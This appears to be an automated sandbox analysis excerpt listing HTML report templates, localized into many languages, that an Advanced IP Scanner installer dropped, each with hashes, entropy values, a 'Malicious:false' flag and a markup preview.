                                                                                                                      SHA-256:4A9255685D393748B0E36243601E546222C005F1D24C99C97CDB3B926A27BC5D
                                                                                                                      SHA-512:0F4D2C69D548E5550A93CE5A8D8C58A6449D4432F561554ABA54880C154999D11360412CF15DED3261EA485C49976F173A49C211C22C2D80E8BFBACF981C168D
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Statut:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Syst.me d'exploitation:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricant:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utilisateur:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Date:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Commentaires:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>D.
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2080
                                                                                                                      Entropy (8bit):4.902799949328129
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:b1+7UxUhUZU+UeUQUCUyUCUJUZUUoUH0UAUvUlU7UJUQU+UYD8UCtZUn+:xL+O2Z5bNdNG2y/rMyYGb6Ct2n+
                                                                                                                      MD5:64D0C8B9E985CFD51786E85509000617
                                                                                                                      SHA1:65FC3558C0BED0CDECFCDAF9BA55F7EFACCBC694
                                                                                                                      SHA-256:F3A60BD72994B19FB680F5071DAA675A6A07FE3805522F26456958A260999FCD
                                                                                                                      SHA-512:DEB626895CC5C445F99214F26FB605BD5D9787E0545224A5E2B51E33371B9A6E88533E5F443FE72B619959391BA5183C40EC50F76D46BD1313BB062EA0679F96
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 dir="rtl" align="right" style="margin-left:2em">{name}</h3><p></p>..<table dir="rtl" align="right">...<tr><td dir="rtl" align="right" style="padding-left:1em">{status}</td><td dir="rtl" align="right" style="padding-left:1em"><b>.....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{os}</td><td dir="rtl" align="right" style="padding-left:1em"><b>..... .....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{ip}</td><td dir="rtl" align="right" style="padding-left:1em"><b>IP:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{mac}</td><td dir="rtl" align="right" style="padding-left:1em"><b>MAC:</b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{manufacturer}</td><td dir="rtl" align="right" style="padding-left:1em"><b>....: </b></td></tr>...<tr><td dir="rtl" align="right" style="padding-left:1em">{netbios}</td><td dir="rtl" align="right" style="padding-left:1em"><b
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1158
                                                                                                                      Entropy (8bit):4.839285803199877
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:AMJnuKov2Fke2B2uT2Bxc+2MKb2tq2HcA2RCz282n0Kt1RhRGDbgzY1pvzAkReEs:lFouAsuSMBXqHH+lL0Kt5RGDjReEhyv
                                                                                                                      MD5:1D24AAD630182B5018D26EE86FF9E1E5
                                                                                                                      SHA1:D0FFCE32DEB2A2B5BD98274D2D74B135855243F1
                                                                                                                      SHA-256:ED422482346F25140F3A4BC2B76225E64C0FB697FC4D9A0691F2B546E041D374
                                                                                                                      SHA-512:D943A02304C8EBA2306830FCCDAEB033E7C8D9AB5F385DC57ED5AB3B08B20B8EF343F28D6DC12990B62A718B3B96885A7E9893D29A0ACA6E7FDDDD29AFD8E5F5
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativni sustav:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Proizvo.a.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Korisnik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Vrsta:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentari:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Usluga</center></b></td><td><b><center>Pojedinost
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1177
                                                                                                                      Entropy (8bit):4.903797892947706
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFoybd/suSYXqZqH0vi4cS0Kt5RGDAM9ReEhyv:HH9sRYXqYHqSS0U2DAes
                                                                                                                      MD5:5F29203D51A1A790B22063DE29E377AC
                                                                                                                      SHA1:C0EDB2A7108E532E66D7B730466022403C64F50D
                                                                                                                      SHA-256:C698D74D598B66CBDA7E11B80A6179AAD54AC7CCBA7127E517E4B5AC9FF4C6CD
                                                                                                                      SHA-512:D451ADA494D387FA540F90C4F767451463ADFA3B81416E99DE14F2FCC39DD586677E359B0151CA8892BB18F847821D7B002F00D85886909A4F01D094195A27FC
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.llapot:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.ci.s rendszer:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gy.rt.:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Felhaszn.l.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T.pus:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>D.tum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Megjegyz.sek:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Szolg.ltat.s</center></b></td><td><
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1148
                                                                                                                      Entropy (8bit):4.7922327669232505
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFoufsuSqJXqL0He3yk/0Kt5RGDNsm6ReEhyv:HnfsRqJXqL0He3ym0U2D+mAs
                                                                                                                      MD5:88B009CCACF0EB1B4A141470D3F160C4
                                                                                                                      SHA1:EE0D1A44562CCDEDBCDE92D232FA541F53826B4B
                                                                                                                      SHA-256:D2254ED99166A12CE00F93379142ACFCBF9A49AF3FB8789E8215B0C1CCCB4587
                                                                                                                      SHA-512:D07C7B90A12E7E48A90BF450A57E4479AE5BB130EFE9950A316D9A7AB9063D94AF0F35942925ACA41A7C2C149A0F31A075C38DD0B34821F88BD81588660D0BE1
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistem operasi:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsen:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Pengguna:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipe:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Tanggal:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentar:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Layanan</center></b></td><td><b><center>Rincian</center>
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1149
                                                                                                                      Entropy (8bit):4.78207214825378
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFoBbqsuSqrXq9CHRM9830Kt5RGDeqVReEhyv:HSbqsRqrXqgHw830U2D9Xs
                                                                                                                      MD5:470C4551612D8025E2C1FF7129C75577
                                                                                                                      SHA1:BA632F06A6C8A7A3E7E53FD6359BEDF2136399BB
                                                                                                                      SHA-256:8C04F3998E1827EE98EDB0D17A591F507F75478C88B8A98DA5FABD55DDCFA18E
                                                                                                                      SHA-512:21D3AD77522C40E2E4B5C75805EA8460EF6C1ABC4DAA7BD95E1AA7B5387DDA83589EF8A1DA6A915B975524C8B2081CEEF274AD87C3EE1E4EFD02C581D1D33A6C
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stato:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operativo:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produttore:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Utente:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Commenti:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servizio</center></b></td><td><b><center>Dettagli</center
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1187
                                                                                                                      Entropy (8bit):5.11658152620251
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFoIyGsuSIXqONHCYQhD0Kt5RGD0ReEhyv:HEGsRIXqONHChhD0U2D2s
                                                                                                                      MD5:7B64191A23A7F9EF19022435267FED84
                                                                                                                      SHA1:3BDE9A320DFC55B0F19625A0CC3DCD3DA41C04C6
                                                                                                                      SHA-256:58BA15AE4911E063749B5A4B7A34272E515F0C0A4399910AE0B983C90AF33516
                                                                                                                      SHA-512:F26B20D469909DE8979D10E19BEB94AB556D1D2C241BB1FBE99AD421F1E990DC2A4F7F3E3923A493058A396CEB2E8781CA7ED0802A9893E88D4196BB16C3E7C1
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>....</center>
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1162
                                                                                                                      Entropy (8bit):5.054590965912235
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:AMJnuKoh2Oe2B2uT2B6b2MKb2tFb2HcS2RF2TQ2n0Kt1RhRGDbYUzYKeIzAkReEs:lFoMOhsuSrXquHuSr0Kt5RGDBPReEhyv
                                                                                                                      MD5:AAFE73E9DD742ECBA22903D3DA498688
                                                                                                                      SHA1:AE8580EFD2267042ABB5D6EBC36A0277345BE963
                                                                                                                      SHA-256:777877C97D0D8753B28A02666B19729B8E2046A387895CD675EF2E5EEBAE1C7A
                                                                                                                      SHA-512:06C7B541638FA292E0438EDBD71733F35988C95A99F10B873299D55D92C66347B974969E31EFEC51B6D9F64859434243BF4252642651DC61E18F067C2A2784E4
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>.. ..:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>...</center></b></td><td><b><center>.. .
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1169
                                                                                                                      Entropy (8bit):4.842737243338588
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFollyUhsuShXqLHu8A0Kt5RGD1PyReEhyv:H+lySsRhXqLHu8A0U2D+s
                                                                                                                      MD5:59A017F97EA0743C741E972819CFEA19
                                                                                                                      SHA1:E6480E68B930A8595EACBAC255B3BFAFCC30D466
                                                                                                                      SHA-256:71D87CFE5437A1407EE398C94F33CBFC8B7DB2EBD7C05BD8A9F2D5817A0F5828
                                                                                                                      SHA-512:95B1DF32A4CFB88B8B086121DB65822D114420189F64CA429DE8578983DDA2C825EB017D1E30A1286B618B8B61DB16BB10B85609C88B840A3B5FC48558BF21EE
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>B.sena:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operacin. sistema:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Gamintojas:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Naudotojas:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarai:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Paslauga</center></b></td><td><b><center>I.sami
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1179
                                                                                                                      Entropy (8bit):4.8880159035742965
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFoxnsuSzf9Xqkf9HMXQph0Kt5RGDtn9U8ReEhyv:HqnsRJXqklHMAr0U2Dtn9Js
                                                                                                                      MD5:1588431C36A3112355553A6967E3405E
                                                                                                                      SHA1:0987D0C5E70F9F25B2E83AA314C83EC8B67539E8
                                                                                                                      SHA-256:69655CAB681BC5E4B8AB6D3E160CE914193156E9FD09DA36B3116B6BB958457B
                                                                                                                      SHA-512:F4A1362AA900BA4B854E8DB2653D21A26D6A21151D2A979076C81B9F1DC9048DA95EE193C9FA4EDB67E8F85D71F23460C2180213D031B548DCFC495F58990351
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Statuss:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Oper.t.jsist.ma:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Ra.ot.js:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Lietot.js:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tips:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datums:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Koment.ri:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Pakalpojums</center></b></td><td><b><center>De
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1149
                                                                                                                      Entropy (8bit):4.789609676615686
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFouisuSqgQXqI/HuW4/0Kt5RGDVGAk9cReEhyv:HnisRqJXqaHuWK0U2DVXk9+s
                                                                                                                      MD5:C81043ED485CCE96CDA08A5986F04E31
                                                                                                                      SHA1:8FD38C17A704D3FAF29FF319A86F0FD42A3FC9AA
                                                                                                                      SHA-256:119B9E8CA8946875860D593402EF4B085FD3284AA530E757B2A3B9A4B1A0C3F4
                                                                                                                      SHA-512:56B916FA8AE9450FBD46BDA6322DE4C9BFC1A92D23A6DA751D615E3C5677C9C2A0B3B50A61831BE7B11C57813E5DCD6122A546508A7EBEF27EE6E2EAE544BFAE
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Operativsystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Produsent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Bruker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Dato:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentarer:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Tjeneste</center></b></td><td><b><center>Detaljer</center
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1154
                                                                                                                      Entropy (8bit):4.79937338549848
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFou0BQsuSDQXqbd/Hulm0Kt5RGDz9ScReEhyv:HnkQsRkXqbhHulm0U2Dz9S+s
                                                                                                                      MD5:A420CCFD66627A25731173A49B1C98E1
                                                                                                                      SHA1:CFEDB045EB2F598E86B375A3C9297F4DE8D18F3A
                                                                                                                      SHA-256:FDAD9C0C105BE73D7DCA5B7CB0150D6670EE7BA2824D7DE27CB3F7C9B95CD465
                                                                                                                      SHA-512:99DEFA039F7F3C9697B1712658FCDBB33F72F93CD020796A001AEC90F3F46B2759D2DD4BF96F424F66047AB28A315C77DD292625A0514205136DE08C37054236
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Besturingssysteem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabrikant:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Gebruiker:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Type:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Opmerkingen:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Service</center></b></td><td><b><center>Details</c
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1155
                                                                                                                      Entropy (8bit):4.85707182260681
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:AMJnuKome2B2B2uT2B8G2MKb2tcz2HcqQ2Rn2o2n0Kt1RhRGDb7zYLtzAkReEiWC:lFoUssuSqZXq5HJ8n0Kt5RGDUReEhyv
                                                                                                                      MD5:1AD783BD4AF434D47BD69AB818A91DFA
                                                                                                                      SHA1:8CC2CED11B633A2F11A1E48E7F209A6E9E0A3187
                                                                                                                      SHA-256:2A51B6D68D941C570E1F4DE827D60CE7B0063D255A52099B46406D14249EF919
                                                                                                                      SHA-512:1AD4BE09630713AB267391C57C0C71AA139B69799F612DC17D8EBD57D91E98E6B037D8102892BB6A53D4CA3AD9EC9C6BDF3F002AEBC69468AFAAEB84211C9E02
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stan:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>System operacyjny:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Producent:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>U.ytkownik:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Komentarze:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Us.uga</center></b></td><td><b><center>Szczeg..y</
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1158
                                                                                                                      Entropy (8bit):4.820254321830803
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFouCsuShXq+HRM98W0Kt5RGDK9HReEhyv:HnCsRhXq+Hw8W0U2DK9ds
                                                                                                                      MD5:82043E0E5311A889AD7709A4A735BC76
                                                                                                                      SHA1:F7E2ADBB76BF88A2761F489CB42AAFEF15C95E37
                                                                                                                      SHA-256:9B401CE58F581FE4FF8ECECADBF4A4A4A83C3A0BFAE18A9D0FA9D0D1E6C1B990
                                                                                                                      SHA-512:E14FC86BF8DFD07536A357A760CDD2858B3536DF69D7FDA7BE06429E9969116C864D3B6036E1E05EA637621DA69F9BBD6776276C1D520F7140DB2646BB9896C0
                                                                                                                      Malicious:false
                                                                                                                      Preview:<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Sistema operacional:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Fabricante:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Usu.rio:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Tipo:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Data:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Coment.rios:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Servi.o</center></b></td><td><b><center>Detalhe
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1155
                                                                                                                      Entropy (8bit):4.803303336966706
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:lFouq/suSqY/Xq96P/HZryq90Kt5RGDQz9wgReEhyv:HXq/sRqqXq+HZOQ0U2DQz9was
                                                                                                                      MD5:27C167C1E5624DC7F4D0256ABAA8632F
                                                                                                                      SHA1:7D1E07791656B4EE2B26264D28ED3DEC9CD30C9A
                                                                                                                      SHA-256:E84981884815C811EB43482F59016F6920EC3D65C22F6A3CE107CD48E8D91863
                                                                                                                      SHA-512:C63F4C7F0CBF7F86C58EF8CB9E4AE5DDDEEB207C47CD11D2CAF3BFEACE1F9F8BCB9A4C52087D2D09469BF4F50133309ACDED2C0572351902761F31B9070E8794
                                                                                                                      Malicious:false
